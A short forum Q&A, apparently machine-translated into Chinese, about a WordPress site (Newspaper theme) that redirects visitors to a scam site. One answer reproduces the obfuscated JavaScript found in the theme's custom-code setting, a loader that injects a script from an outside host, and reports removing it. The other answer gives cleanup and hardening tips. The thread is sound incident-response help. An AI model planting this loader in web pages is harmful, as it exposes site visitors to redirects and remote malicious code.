今天我的客户告诉我,他的网站会自动重定向到另一个外部诈骗网站。乍一看,文件目录没有问题,设置字段也没有注入。
Wordfence 没有报告任何类型的警告,但客户端机器中的 Avast Antivirus 报告木马警告:
“ JS:Fakepush-A [Trj] ” 感染
Wordpress 5.4.1 版 主题:报纸 V 6.6.4
有任何想法吗?
问问题
483 次
2 回答
0
仔细查看后,我在主题设置---->自定义代码----->自定义 Javascript 中发现了一部分似乎与原始项目无关的代码:
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}
已移除。在完全清除缓存(包括 .js 分钟)后,网站不再重定向。此外,我认为主题需要升级。
于 2020-05-31T23:26:26.550 回答
0
您需要检查多项内容。
您所说的重定向可以出现在 header.php、footer.php 以及任何加载的 javascript 文件中。检查 wp-content/upload 文件夹中的恶意文件。
您还需要检查数据库表。
我建议安装 Wordfence 并扫描网站。
一旦您删除并测试它,您将需要提高它的安全性 - 检查所有插件是否是最新的,以及它们是否有任何漏洞。我发现这个网站非常有用:https ://wpvulndb.com/plugins
于 2020-06-01T11:36:14.640 回答